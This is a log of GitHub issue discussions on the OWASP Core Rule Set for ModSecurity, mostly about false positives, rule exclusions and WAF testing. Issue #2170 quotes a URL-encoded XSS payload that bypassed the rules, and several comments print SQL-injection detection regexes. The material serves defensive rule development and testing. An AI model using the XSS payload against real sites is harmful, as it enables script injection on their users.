[2021-07-06 00:16] diegaless opened #2150 "Unable to access a user's post PHPBB 3.3.3"
**Description**
Unable to access a user's post (Forbidden), however he was able to post it successfully

**Audit Logs / Triggered Rule Numbers**
GET /viewtopic.php?f=55&t=1104&p=1705

**Triggered rules:**

- Rule 7f2c11a26c88 [id "-"][file "/usr/share/modsecurity-crs/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf"][line "92"] - Execution error - PCRE limits exceeded (-8): (null).
- Rule 7f2c119ddd38 [i

[2021-07-06 00:17] diegaless commented on #2150
I mention you directly, because I know you are the right person, when you can take a look, any info ask for it @azurit

[2021-07-06 05:58] airween commented on #2150
Hi @diegaless,

thank your for your detailed report. I'm afraid we need more information to investigate this issue. You wrote the request is `GET`, but if the rule [200004](https://github.com/SpiderLabs/ModSecurity/blob/v2/master/modsecurity.conf-recommended#L85-L86) triggered, that means you sent a multipart request.

It would be good to see the whole request - can you share with us a `curl` exam

[2021-07-06 08:17] diegaless commented on #2150
sorry, rule 200004 was placed on me, it did not belong to this false positive, I have already edited the original message.

The request is effectively a get, it did not make sense that it was a multipart, otherwise I would have specified it, I hope that I can continue working with this

[2021-07-06 08:33] azurit commented on #2150
@diegaless Hi friend! Can you try this?

[code]

[2021-07-06 08:41] diegaless commented on #2150
You are the best @azurit  hahaha! It works!

Thanks for everything, awesome work

[2021-07-06 08:44] dune73 commented on #2150
He's a wizard. :)

But the question is whether this is a generic FP we ought to avoid in the future or something that has to be accepted. Looking at the payload containing Postgresql, I'm not surprised this was hit by a rule...

[2021-07-06 08:50] diegaless commented on #2150
For if it helps, this is why I jump to the rule specifically (I specifically think that the beginning of the sentence):

[2021-07-06 09:15] azurit commented on #2150
I think this can be integrated into exclusion package  - it was matched on `RESPONSE_BODY` on a forum post (which can contain literally anything and it's ok, it is a forum where users can post any content).

[2021-07-06 09:20] dune73 commented on #2150
Good comment on 951240.

Can you limit it to the RE to the very URI where the forum post is concerned? Ideally combined with GET method.

[2021-07-06 09:34] diegaless commented on #2150
phpbb supports postgre and more dbs:
MySQL 3.23 or above (MySQLi supported)
MariaDB 5.1 or above
PostgreSQL 8.3+
SQLite 3.6.15+
MS SQL Server 2000 or above (via ODBC or the native adapter)
Oracle

Info:

[2021-07-06 09:36] azurit commented on #2150
Oh, sorry, didn't know that! Anyway, combined with GET method, i think it can be integrated anyway. @dune73 what do you think?

[2021-07-06 09:57] dune73 commented on #2150
Following CVE-2021-35638, I'm very weary of rule exclusions. I think it really depends on the PHPBB URIs.

[2021-07-06 10:06] azurit commented on #2150
URI is exactly what's in the rule above: `domain/viewtopic.php`

[2021-07-06 14:06] RedXanadu commented on #2147
I could take a stab at this.

Arch brings to the table:
[code]

and CentOS 6.8 adds:
[code]

---

So, this long, amalgamated list is being added to both `lfi-os-files.data` and `restricted-files.data`, except maybe the `/proc/<digit>` entries?

Should the existing `/proc/...` entries from `lfi-os-files.data` also be added to `restricted-files.data`? For quick reference, those current, existing ent

[2021-07-06 18:54] devikandixit opened #2153 "Could not block IP address of brute force attack using modsecurity & core rule set."
We are using apache windows web server. When client hits our web URL we have a log in page (this is apache managed) that authenticates the user.
We need to take action for unsuccessful log in attempts by the user.
We wanted to delay log in process for the brute force attacker after 3 unsuccessful log in attempts.

For this we are experimenting the use of Mod Security module (ModSecurity 2.x) .
I h

[2021-07-06 18:59] dune73 commented on #2153
Hi there, thanks for writing in, yet I think you are using the wrong tool to fight this.

The DoS protection rules are not the strongest part of CRS and they are not useful for bruteforce attacks unless you know them by heart and tweak them to work.

What you should be looking into is mod_qos that is doing exactly what you want.

I am closing this. If you are convinced this is a CRS malfunction, t

[2021-07-06 18:59] #2153 closed

[2021-07-06 19:17] devikandixit commented on #2153
Thank you. However I dont think mod_qos will fix our issue.

We are using Apache server on Windows. We do not have our own custom login page for our web server. We are relying on OS controlled(NTLM/Kerberos Authentication)log in page. However log in page do not prevent user log in (delayed log in for ex) after unsuccessful authentication. Hence we thought to use Mod Security to prevent it.

Also w

[2021-07-07 13:23] RedXanadu commented on #2146
I think that #2155 resolves this issue

[2021-07-07 15:33] #2146 closed

[2021-07-07 15:48] dune73 commented on #2147
I think this is the right approach, @RedXanadu. Thanks.

As for @lifeforms's question about the API's interested in `.../proc/1` and the like. I do see that as well as a possibility. But I would let it run and tackle it once people really report FPs.

[2021-07-13 19:55] fzipi commented on #1991
Ok, so I found some time to run some tests with gotestwaf.

Tests were made using the same docker-compose we use for testing using ftw/go-ftw, with just one modification:
[code]

Here are the results (they differ depending on the url used):

1. Test with CRS in paranoia level 4:
[code]

2. Test using `/get` (we are using httpbin, so "GET" methods would return 200)

[code]
3. Test using `/post` (we

[2021-07-13 19:57] fzipi commented on #1991
[waf-evaluation-report-generic-2021-July-13-19-46-05.pdf](https://github.com/coreruleset/coreruleset/files/6811619/waf-evaluation-report-generic-2021-July-13-19-46-05.pdf)
[waf-evaluation-report-generic-2021-July-13-19-46-32.pdf](https://github.com/coreruleset/coreruleset/files/6811620/waf-evaluation-report-generic-2021-July-13-19-46-32.pdf)
[waf-evaluation-report-generic-2021-July-13-19-46-58.pdf

[2021-07-13 20:03] fzipi commented on #1991
This is with `PARANOIA_LEVEL=2`:
[code]

[2021-07-13 20:11] fzipi commented on #1991
And the one that I really like, is the one that comes from adding `--nonBlockedAsPassed`:

[code]

[2021-07-13 20:11] fzipi commented on #1991
In summary: there might be some bypasses in PL4 that we might want to look, but probably I would say the bypass is wrong.

[2021-07-14 22:26] Gwynnbleid1 opened #2160 "Missing id in two rules"
### Describe the bug

I believe that in file RESPONSE-951-DATA-LEAKAGES-SQL.conf in rule in lines 88-92 and 416-420 are missing id's

### Steps to reproduce

I get them in error log when I log into wp-admin index page of wordpress

### Expected behaviour

id is present:
`[Thu Jul 15 00:08:08.498702 2021] [:error] [pid 115518] [client 109.206.205.35:43672] [client 109.206.205.35] ModSecurity: Rule

[2021-07-15 07:25] azurit commented on #2160
This is because of PCRE limits: `PCRE limits exceeded`, please see these configuration directives in `modsecurity.conf`:
[code]
Closing.

[2021-07-15 07:25] #2160 closed

[2021-07-15 07:49] Gwynnbleid1 commented on #2160
I think I have default there:
SecPcreMatchLimit 100000
SecPcreMatchLimitRecursion 100000

you are saying that when I log in to admin page of more or less default installation I'm making more than 100000 regex operations (I don't really know what this PCRE is...) ?

[2021-07-15 08:40] azurit commented on #2160
Yes. Try setting both to 200000.

[2021-07-15 20:40] fzipi commented on #2062
Updating:

 Moved this test to a new file, and tried hard to make it match. Still no luck, and probably the output is to remove the test.

[2021-07-15 20:45] dosfx opened #2161 "blocking allowed content-type"
### Description
[code]

### Audit Logs / Triggered Rule Numbers

900220 I think?

### Your Environment

* CRS version (e.g., v3.2.0): 3.2.0
* Paranoia level setting: 1
* ModSecurity version (e.g., 2.9.3): 3.2.0
* Web Server and version (e.g., apache 2.4.41): nginx 1.21.1
* Operating System and version: debian buster (in a docker container)

### Confirmation

[*] I have removed any personal data (e

[2021-07-15 21:10] fzipi commented on #2161
Thanks for the report, will be checking this one shortly.

[2021-07-16 00:13] recurlybil opened #2162 "Rule 941140 FP"
Rule 941140 incorrectly matches on the following test strings:

<meta charset="utf-8" />

<style type="text/css">

[2021-07-16 04:49] airween commented on #2161
hi @dosfx,

I think you've missed to attach your audit log, but based on the info above I'm afraid you have added the CT with wrong format - eg. you forgot to escape the `+`?

See this [regex](https://regex101.com/r/f7RhKl/1)

[2021-07-16 06:56] dune73 commented on #1991
Thank you very much @fzipi. I do not really get all of your statistical tables above, but I was able to extract useful information from the PDF reports and validated by hand. I looked at the false positives and the bypasses (but not the unresolved cases).

### False Positives at PL1

[code]

### False Negatives at PL1

[code]

[2021-07-16 06:58] dune73 commented on #1991
For the false negatives, I am unsure what to do. The mail injection stuff that we only catch at PL4 (and only by accident) is asking for a new rule I guess.

The Windows RCE that we only catch at PL3 is substantial. If this tripple dot work in Windows, we should catch it at PL1 I guess.

The stuff that we catch at PL2 is not overly noteworthy, I guess.

[2021-07-16 11:00] fzipi commented on #1991
Excellent!

I've been playing with the idea of adding fuzzing to go-ftw. I guess from this one that it might make some sense after all...

[2021-07-16 11:09] dune73 commented on #1991
So you would take the payload in an existing test and start to fuzz it?

[2021-07-16 12:15] dosfx commented on #2161
Thanks for the reply, @airween. We thought that might be the issue, but the default contains `application/soap+xml` without an escaped `+`, so we moved on.

I will give it a try and report back.

[2021-07-16 12:27] fzipi commented on #1991
Yes, that's the idea. Provided that can be done.

[2021-07-16 13:04] dosfx commented on #2161
@airween That worked! Thanks again for looking at it.

Someone might want to double check that the `application/soap+xml` in the default works.

[2021-07-16 13:05] airween commented on #2161
you're welcome!

I'll do that soon. Thanks for your help!

[2021-07-17 10:34] mircobabini commented on #1041
Check bullet 3.2 which explains this issue: https://mkyong.com/blog/mod_security-blocking-my-ip-when-editing-post-in-wordpress/

[2021-07-18 19:31] airween commented on #2161
Hi @dosfx,

sorry for the question, are you sure you use CRS 3.2?

The rule [920420](https://github.com/coreruleset/coreruleset/blob/v3.2/master/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf#L915) uses `@rx`. Now I've checked, and it works **without** escape sequence (you can see the escaped characters, but the reason is simple: the engine puts these sequences to there):

[code]

The operator has ch

[2021-07-18 19:42] airween commented on #2161
Okay, I found the reason of the false behavior: `@rx` uses case-insensitive, but `@within` doesn't.

I assume you put the new CT as you wrote: `application/repository.jdbcDataSource+json`, not `application/repository.jdbcdatasource+json`. If you use this one, it should have to work.

[2021-07-18 19:42] #2161 closed

[2021-07-19 12:44] fzipi commented on #2161
@airween Maybe adding something to our documentation would help others also?

[2021-07-19 13:52] airween commented on #2161
Thanks @fzipi, PR #2164 is pending.

[2021-07-19 14:02] dune73 commented on #2127
Any update here, @theseion?

[2021-07-19 14:03] dune73 commented on #2109
Any news on this front @lifeforms and @theseion?

[2021-07-19 14:03] dune73 commented on #2095
Ping @lifeforms ...

[2021-07-19 14:06] dune73 commented on #2071
I know you are very busy @lifeforms, but can you still give us a status?

[2021-07-19 14:10] dune73 commented on #2062
I agree. If a test is that hard to fix, then it's probably a bad test. So let's remove it. PR welcome.

For the record, we're talking about 932100-3, are not we?

[2021-07-19 14:11] dune73 commented on #2044
We'll not so soon it seems. But this is not forgotten.

[2021-07-19 15:04] dosfx commented on #2161
Hi @airween

I'm fairly sure we are using v3.2, that is the version in the folder path inside the container. Also the audit log refers to the `Rx` operator and not the `within` operator.

Just for kicks I tried your advice of using all lowercase in the `tx.allowed_request_content_type`. but you can see in the audit log it is still blocking with that setup:

[code]

Its got the all lowercase versio

[2021-07-19 15:09] dune73 commented on #2135
The `&Ping Pong` does not trigger any rules for me. Yet `&ping pong` triggers 932150.

The link break brings the following:

[code]

The difference with lowercase is fairly striking. As is the number of rules bring triggered. I suggest to replace Ping Pong with table tennis. That fares a lot better from a FP perspective.

[2021-07-19 15:20] dune73 commented on #2142
@fancsali : Did you have time to try this out? Did it fix your problem? If yes, we can make it part of our standard rule exclusion packages.

[2021-07-19 15:22] theMiddleBlue commented on #2118
Hi @franbuehler sorry for being late. Agree with you, It doesn't make sense to me too. If we're talking about SQL I doubt that `and =` represents a valid syntax.

[2021-07-19 15:23] dune73 commented on #2145
Any update here, @skwokie? If not, we're going to close this issue soon.

[2021-07-19 15:25] dune73 commented on #2147
Closing this after #2154 has been merged.

[2021-07-19 15:25] #2147 closed

[2021-07-19 15:39] fancsali commented on #2142
Well, indeed, I've been playing around with this, and it seems, I've settled on this:

[code]

On one hand, this is quite a specific exception: it will apply to anything below `/wp-admin`, but not the login page at `/wp-login.php` itself, so it shouldn't compromise the security of the login system itself,

On the other hand, however, some of those rules would switch off PHP and MySQL information l

[2021-07-19 15:55] fzipi commented on #2062
Yes. So I'm removing it and then we can take a look at what to add, if any.

[2021-07-19 17:38] airween commented on #2161
Hi @dosfx,

ah, sorry, you're right - it seems in your log.

And I have to apologize you - I was wrong, when I wrote that `@rx` is case **insensitive** - it's case **sensitive**.

So, in 3.2 you **must** add definitely the same string as your CT:

[code]

Now I have produced a ModSecurity + CRS 3.2 environment, and this works for me. My error.log is empty, and I can see this in my debug.log:

[cod

[2021-07-19 17:46] dosfx commented on #2161
No worries @airween, I'm on the same page now.

The only way I can get it to work is to escape the + in the `allowed_request_content_type`, so in our `crs-setup.conf` we've got `setvar:'tx.allowed_request_content_type=application/repository.jdbcDataSource\+json|appli......`. Which is all fine, it works, but if you want to keep digging as to why you're able to make a request and I'm not, we can.

[2021-07-19 19:24] lifeforms opened #2166 "copy, time and more false positives"
### Description

In #1991, some false positives were found with commonly occurring English words `copy`, `time` and `more`.

[code]

### Audit Logs / Triggered Rule Numbers

#### `copy`:

``
[2021-07-16 08:27:28.301498] [-:error] 127.0.0.1:55372 YPEm0By0s3c8Xzd5uRp5MQAAABY [client 127.0.0.1] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'

[2021-07-19 20:17] lifeforms commented on #2140
Good catch. Probably the failure to trigger on this pattern is due to `t:cmdLine` which deletes the backslash. We should get an additional test for the false negative, and then see if the removal of the transformation passes the test.

[2021-07-19 20:37] theMiddleBlue commented on #2142
note from monthly issue chat: I'll try and check @lifeforms exclusion rules version to add it on WP RE file.

example:
[code]

[2021-07-21 14:04] subzero355 commented on #1948
Using the latest ruleset, I am getting this and unable to browse the files on Nextcloud.
[code]

[2021-07-21 22:18] RedXanadu commented on #2140
@lifeforms I've spent some time looking at this. Unfortunately, I don't think the answer is as simple as removing the `t:cmdLine` transformation function (I tried that, without success.)

When I submit the following test request:
`test.com/?arg=..\testing`
I see in the debug log:
`[9] Target value: "/?arg=..\\testing"`

Are backslashes escaped internally _before_ any operators are executed?

Based

[2021-07-22 04:46] theseion commented on #2127
No, I haven't worked on this yet.

[2021-07-22 21:32] RedXanadu commented on #2066
@dune73 I was thinking about this issue. How would the example rule exclusions be added to the existing Wordpress RE file?

Can the example `SecRuleUpdateTargetById` rule shown above be expressed as a runtime exclusion using a `ctl:ruleRemoveTargetById` action? It seems to rely on a regular expression to handle dynamic argument names.

[2021-07-24 06:17] firasd opened #2167 "HTTP PUT being blocked in WordPress is a false positive"
### Description

It seems like PUT requests trigger the rule "911100: Method is not allowed by policy".
This is an increasingly common type of HTTP request in WordPress plugins

Request:	PUT /lmstest/wp-json/elementor/v1/site-editor/templates-conditions/263
Action Description:	Access denied with code 200 (phase 2).
Justification:	Test 'REQUEST_METHOD' against '!@within %{tx.allowed_methods}' is tr

[2021-07-24 06:23] azurit commented on #2167
Please see rule ID 900200 in `crs-setup.conf` - does it helped you?

[2021-07-24 06:32] azurit commented on #2167
By the way, have you enabled WordPress exclusion package? See rule 900130.

[2021-07-24 06:48] lifeforms commented on #2167
I think you are using the Elementor plugin and we don't have support added for it yet.

If you could post the full error messages (perhaps cleaning your content from it), I can see if I can reproduce it, and add it to our WordPress exclusion package.

We are using Elementor also, it seems to become more popular, but haven't had this FP yet.

[2021-07-24 07:42] firasd commented on #2167
Looks like 900200 was already enabled

And yeah WORDPRESS-EXCLUSION-RULES.conf is enabled

I don't have direct shell/command line access so not able to examine crs-setup.conf.. will see if possible to access that and the the log

I believe PUT is a common method with the new WP REST API which is acccessed via the /wp-json URL, but yeah in this case the plugin in question was Elementor

[2021-07-28 19:56] dune73 commented on #2066
Hmm. It seems I did not really look at this. The runtime rule exclusions (-> ctl) won't work with regexes. It's a major shortcoming with ModSecurity unfortunately.

Guess, we're at a loss here once more. And if the parameter name really is free-form, then things are really difficult.

[2021-08-02 06:02] dune73 commented on #2162
Hey @recurlybil, thanks for writing in and sorry for the late response.

Why do you think this is incorrect? I admit it is not an attach. But it's obviously code and we try not to allow code with the 941xxx rules. You could say 941140 is misdetecting here, while 941150 is correct, but honestly, the rules are never that sharp and there is plenty of overlapping. Also because the code is overlapping

[2021-08-02 14:04] #2141 closed

[2021-08-02 14:17] dune73 opened #2169 "Monthly Chat Agenda August 2021 (2021-08-02 and 2021-08-16)"
This is the Agenda for the Monthly CRS Chat.

The general chat is going to happen on https://owasp.slack.com in the channel #coreruleset on Monday, 2021-08-02, at 20:30 CET. That's the 1st Monday of the month. A separate issue chat is happening at the same location, same time on Monday, 2021-08-16. That's the 3rd Monday of the month. Please note that we have a [CRS calendar](https://calendar.googl

[2021-08-02 15:14] #2062 closed

[2021-08-02 15:38] #1942 closed

[2021-08-02 18:56] franbuehler commented on #2169
# Decisions

## PRs

* #2168 - in need of a quick review - @airween
* #2163 - replacing filenames lead to broken tests. Probably some ftw-fu needed here - @fzipi
* #2156 - review needed so we can remove `ctl:ruleEngine=Off`
* #2151 - adding more teeth to 932200 (uninitialized variables)
* #2149 - cleanup of regexp assembly script(s)
* #2067 - better integration needed, volunteer to finish this wan

[2021-08-02 21:29] recurlybil commented on #2162
I thought the rule was detecting only JavaScript?  Is it also detecting HTML and CSS?  If so, why not just look for angled brackets?

[2021-08-03 16:55] lato333 opened #2170 "XSS Bypass"
### Motivation
We run some sites having mod_security with the OWASP-Core Ruleset 3.3.0 enabled. (thanks for your work ;))
After doing some security analysis, we found out, that some requests bypassed modsecurity and led to successful XSS attacks.

Such an example request would be:
`GET https://mysite.com/en/search/%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E
`

In my opinion, the XSS-Attacks are no

[2021-08-03 17:07] airween commented on #2170
Hi @lato333,

thanks for your report.

As I see you have sent a solution - don't you want to send a pull request?

If you do, please add some test cases - you can find [here](https://github.com/coreruleset/coreruleset/blob/v3.4/dev/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml) many other.

If you don't want to make any PR, please be patient, we will investigate this issue.

[2021-08-04 07:25] dune73 commented on #2170
Hmm. It's definitely a false negative, but I wonder if adding REQUEST_FILENAME at PL1 won't lead to a lot of false negatives. We could add it o 941101 at PL2 where we currently scan the referer. Not sure if we have discussed this before.

@lifeforms: What is your stance on this?

[2021-08-04 07:49] lato333 commented on #2170
There was already a similar discussion in #1022 and REQUEST_FILENAME is already included in Rule-ID 941110.

Unfortunately, I am not that familiar with the rules, so I am not sure in which rule(s) the REQUEST_FILENAME should be included. (in view of false positives)

[2021-08-04 07:57] dune73 commented on #2170
Thank you for the pointer, I had this at the back of my head ...

941110 is nice, but it's a completely different rule. 941100 at PL1 and 941101 at PL2 use the same mechanics (the detectXSS operator provided by libinjection). We call this construct strict siblings. 941101 is a strict sibling to 941100. It's the same rule, but a bit tougher. Here we use the 941101 rule to include items where we exp

[2021-08-04 13:15] stefanpinter opened #2171 "941310 - Double escape and problem with german ü"
### Description

Hi!

The rule says this:
`SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx **\xbc[^\xbe>]*[\xbe>]|<[^\xbe]*\xbe**" \`
But it actually matches this:
**\\xbc[^\\xbe>]*[\\xbe>]|<[^\\xbe]*\\xbe**
Why? This makes it match our string "Gültikeit" which encoded looks like this "G**\xbc**ltigkeit"

### Audit Logs / Triggered Rule Numbers

9

[2021-08-04 14:03] airween commented on #2171
Hi @stefanpinter,

thanks for your report.

Could you show us your request with `curl`? I'm afraid without that we can't investigate this issue.

Btw it's interesting that you have two lines with same `id` (941130), but different content:

[code]

Thank you.

[2021-08-05 06:21] stefanpinter commented on #2171
hi!
sadly, I couldn't make a curl post request  to work for now

Github is adding backslashes like crazy...
but in reality this is what is happening indeed.

The rule only has one backslash before each xbc and each xbe, which make it stand for some special symbols:
`SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \xbc[^\xbe>]*[\xbe>]|<[^\xbe]*\xbe

[2021-08-05 06:58] airween commented on #2171
hi @stefanpinter,

That's [correct](https://github.com/coreruleset/coreruleset/blob/v3.3/master/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf#L527).

Do you see this pattern in your log? If yes, that's because Apache escapes the `\` sequences, it's normal.

No, I'm not sure this one.

If your application works only from browser, you can press CTRL+SHIFT+I, and check the Network tab. There you can

[2021-08-05 07:45] stefanpinter commented on #2171
with the generated curl command it goes through fine it seems

`* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* old SSL session ID is stale, removing
* Mark bundle as not supporting multiuse
< HTTP/1.1 100 Continue
HTTP/1.1 100 Continue

* We are completely uploaded and fine`

[2021-08-05 07:52] airween commented on #2171
These are just the TLS negotiation phase, we have to see the whole request, including headers. The command itself would be the best.

For eg.:

[code]

[2021-08-05 08:27] stefanpinter commented on #2171
Hi! Oh, you are right. curl was waiting for some resonse because I had the score threshold at 5000.
so this curl command does work (it is inside the link)
https://private.motiondata-vector.com/?4637cbd27bf01220#Hs1E2sdjPf5LHnKe61LNY5Gq89t9G2gkoinL1Sos9L1S

[2021-08-05 08:56] dune73 commented on #2171
Link is already gone. :(

When you put things in triple backticks, GH should not add any additional backslashes.

[2021-08-05 08:59] stefanpinter commented on #2171
Hi dune73! https://private.motiondata-vector.com/?01b8c79309b7c351#EqMC16uukG31Znz8UwWhuFny6FjrrsPBuqBhuLpPrRP

[2021-08-05 10:34] Shajin02 opened #2173 "Rule: 942370: False positive 0202"
### Description

```[2021-08-05 10:19:57.] [-:error] ******* ***** [client ***.**.**.**] ModSecurity: Warning. Pattern match "(?i:[\\"'`](?:\\\\s*?(?:(?:\\\\*.+(?:(?:an|i)d|between|like|x?or|div)\\\\W*?[\\"'`]|(?:between|like|x?or|and|div)\\\\s[^\\\\d]+[\\\\w-]+.*?)\\\\d|[^\\\\w\\\\s?]+\\\\s*?[^\\\\w\\\\s]+\\\\s*?[\\"'`]|[^\\\\w\\\\s]+\\\\s*?[\\\\W\\\\d].*?(?:--|#))|.*?\\\\*\\\\s*?\\\\d)|[()\\\\*<

[2021-08-05 11:08] dune73 commented on #2171
Thanks @stefanpinter.

Here is the condensed minimal request (30min of work):

[code]

[2021-08-05 11:38] airween commented on #2173
Hi @Shajin02,

thanks for your report - sorry to hear your issue.

Please note, that if you set your PL to 2, you can get some FP's - for details, see [this](https://coreruleset.org/faq/#paranoialevel):

_"PL2 may cause some FPs which you need to handle."_

The best solution in this case is make an exclusion. I'm afraid in order to help, we need more information. For the exclusion, you need to cho

[2021-08-05 12:05] Shajin02 commented on #2173
Thanks  a Lot @airween , Let me check and get back to you, Then I can proceed with closing the issue

[2021-08-05 13:33] Shajin02 commented on #2173
@airween in your above fix, /your/uri/

Do i need to give the whole URL ? I can see it based upon the user I have selected, So the contents inside the URL will be dynamic.

Example: Please find the s,ample
url/url/first/user1/sites1/data1/
url/url/second/user2/sites2/data2/

How can we give in the URL as dynamic or we can give the first two part as "@beginsWith /url/url/"?

[2021-08-05 13:51] airween commented on #2173
Hi @Shajin02,

no, it does not necessary. But you can choose many other operator, `@beginsWith` was just an example.

For the whole list, see the ModSecurity's [reference](https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual-(v2.x)#Operators).

then you can use `@rx`, for example.

it's hard to decide - the common part of the two URL's above is just the `url/url/`. Try to use this one:

[2021-08-05 17:00] Shajin02 commented on #2173
SecRule takes two or three arguments, rule target, operator and optional action list

I cant start the apache and it gives the syntax error, Is this expected?

[2021-08-05 17:12] airween commented on #2173
yes,

no - what did you set? My examples above contains the `...` at the and of the lines, which means you have to set up the actions. See my [first](https://github.com/coreruleset/coreruleset/issues/2173#issuecomment-893389279) example.

[2021-08-05 17:19] Shajin02 commented on #2173
Sorry I am not getting your last line, I have pasted your first example with replacing "NNN" and "uri" , Could you please help/clear with actions!

[2021-08-05 17:26] airween commented on #2173
I checked my rule above, it works:

[code]

What is your exact error message?

[2021-08-05 17:33] Shajin02 commented on #2173
it gives syntax error in last line (ctl:ruleRemoveTargetById=942370;ARGS:fq") and I can see the error message as "SecRule takes two or three arguments, rule target, operator and optional action list"
then the apache fails

[2021-08-05 17:38] airween commented on #2173
Can you show the part of your config file, how looks like this rule? A screenshot or a `tail`/`less` output....

[2021-08-05 17:43] Shajin02 commented on #2173
File: REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf
#SecRule REMOTE_ADDR "@ipMatch 10.0.0.0/8" \
#    "id:1005,\
#    phase:1,\
#    pass,\
#    nolog,\
#    chain"
#    SecRule REQUEST_METHOD "@pm GET HEAD" "chain"
#       SecRule REQUEST_HEADERS:User-Agent "@pm ELB-HealthChecker" \
#           "ctl:ruleRemoveById=911100,\
#           ctl:ruleRemoveById=913100,\
#           ctl:ruleRemoveById=91311

[2021-08-05 17:53] airween commented on #2173
[code]
here is your typo. This is the correct form:
[code]

[2021-08-05 18:13] Shajin02 commented on #2173
Thanks, But the provided fix doesnot fix the issue :(. Still i can see the false positive

[2021-08-05 18:21] airween commented on #2173
Good to see - please close this issue, if you don't have any question.

[2021-08-05 18:22] Shajin02 commented on #2173
Yeah sure, I will do some test and close the issue

[2021-08-05 18:26] Shajin02 commented on #2173
There was an another issue with other rule, So you can suggest in the same issue or need to raise a new one?

ModSecurity: Warning. Pattern match "(?i)\\\\b(?:c(?:o(?:n(?:v(?:ert(?:_tz)?)?|cat(?:_ws)?|nection_id)|(?:mpres)?s|ercibility|(?:un)?t|llation|alesce)|ur(?:rent_(?:time(?:stamp)?|date|user)|(?:dat|tim)e)|h(?:ar(?:(?:acter)?_length|set)?|r)|iel(?:ing)?|ast|r32)|s(?:u(?:b(?:str(?:ing(?:_inde

[2021-08-05 18:26] Shajin02 commented on #2173
Can I use the same above sample for this for ARGS:q?

[2021-08-05 18:27] airween commented on #2173
yes, you can make a new exception. The `id` must be different.

[2021-08-05 18:27] Shajin02 commented on #2173
Great Thanks

[2021-08-05 18:38] Shajin02 commented on #2173
[code]
This does not seem to fix it

[2021-08-05 18:43] airween commented on #2173
What do you get in your error log?

You can check that this exclusion works, if you leave the `nolog` action, and add these ones:
[code]

[2021-08-05 18:50] Shajin02 commented on #2173
Like this? Am getting the syntax error on message line

SecRule REQUEST_FILENAME "@beginsWith /index/" \
    "id:500012,\
    phase:1,\
    pass,\
   # nolog,\
    log,\
    msg:'Exclusion activated',\
    ctl:ruleRemoveTargetById=942150;ARGS:q"

[2021-08-05 18:54] airween commented on #2173
Please remove the `# nolog...` line. But this just helps to find the reason, the other log part is more important.

[2021-08-05 18:57] Shajin02 commented on #2173
[2021-08-05 18:56:19.747196] [-:error] ModSecurity: Warning. String match "/versa/" at REQUEST_FILENAME. [file  [line "36"] [id "500012"] [msg "Exclusion activated"] [hostname "t"] [uri "] [unique_id ""]

[2021-08-05 18:58] airween commented on #2173
The exclusion activated, but looks like you forgot something.

You should show the log part what causes the FP.

[2021-08-05 19:00] Shajin02 commented on #2173
ModSecurity: Warning. Pattern match "(?i)\\b(?:c(?:o(?:n(?:v(?:ert(?:_tz)?)?|cat(?:ws)?|nection_id)|(?:mpres)?s|ercibility|(?:un)?t|llation|alesce)|ur(?:rent(?:time(?:stamp)?|date|user)|(?:dat|tim)e)|h(?:ar(?:(?:acter)?_length|set)?|r)|iel(?:ing)?|ast|r32)|s(?:u(?:b(?:str(?:ing(?:_index ..." at ARGS:q. [file "/coreruleset-3.4-dev/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "653"] [id "9

[2021-08-05 19:05] Shajin02 commented on #2173
ModSecurity: Warning. Pattern match "(?i:\\\\\\\\b(?:c(?:o(?:n(?:v(?:ert(?:_tz)?)?|cat(?:_ws)?|nection_id)|(?:mpres)?s|ercibility|(?:un)?t|alesce)|ur(?:rent_(?:time(?:stamp)?|date|user)|(?:dat|tim)e)|h(?:ar(?:(?:acter)?_length|set)?|r)|iel(?:ing)?|ast|r32)|s(?:t(?:d(?:dev(?:_(?:sam|po)p)?)?|r(? ..." at ARGS:q. [file "/u01/appl/sdwan/waf-sdwan/coreruleset-3.4-dev/rules/REQUEST-942-APPLICATION-ATTAC

[2021-08-05 19:08] Shajin02 commented on #2173
I had given for 2 ID as a separate exception, It worked

[2021-08-06 06:43] airween commented on #2173
Can we close this issue?

[2021-08-06 07:11] Shajin02 commented on #2173
Yes, Thanks @airween  for your great help in solving the issues . Keep supporting

[2021-08-06 07:17] #2173 closed

[2021-08-06 07:31] dune73 commented on #2171
`%C3%BC` is a UTF-8 `ü`, a German Umlaut.

`3E` is `>`.

So we have `Führung>` encoded as UTF-8. `Führung` is a semi-frequent German noun.

[2021-08-06 12:15] stefanpinter commented on #2171
hi @dune73
Sorry, but what can I do with that? or our webdevs,...?

I can at least confirm that this does the same:
curl -i -v https://host.name --data-raw 'foo=F%C3%BChrung%3E'

--12fd9040-C--
foo=F%C3%BChrung%3E
--12fd9040-F--
HTTP/1.1 403 Forbidden
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1

--12fd9040-E--
<!DOC

[2021-08-06 12:22] dune73 commented on #2171
Thanks for the confirmation.

No, this is not for you. It's for us. If we want to fix this, we need to be able to test this. That's why I took the time to condense your payload to the minimal payload that triggers the alert.

Now we have that and we can go about fixing this. Or we decide to leave it, since the `>` is quite indicative of an XSS and it might be better to accept the false positive fr

[2021-08-06 15:32] Shajin02 opened #2175 "Suggestions on Effective monitoring in attacks with WAF 0202"
### Motivation

Hi Guys,

Could you please suggest how effective we can monitor the Mod security OWASP CRS for many attacks and how we can segregate them like false positives and attacks

### Proposed solution
I think we can monitor with error logs and mod sec audit logs, by taking the CRTICAL issues and check with them

Your Environment
CRS version (e.g., v3.2.0):
Paranoia level setting: 1
ModSec

[2021-08-06 15:37] Shajin02 commented on #2175
@airween , Could you please suggest here

[2021-08-06 15:51] airween commented on #2175
Hi @Shajin02,
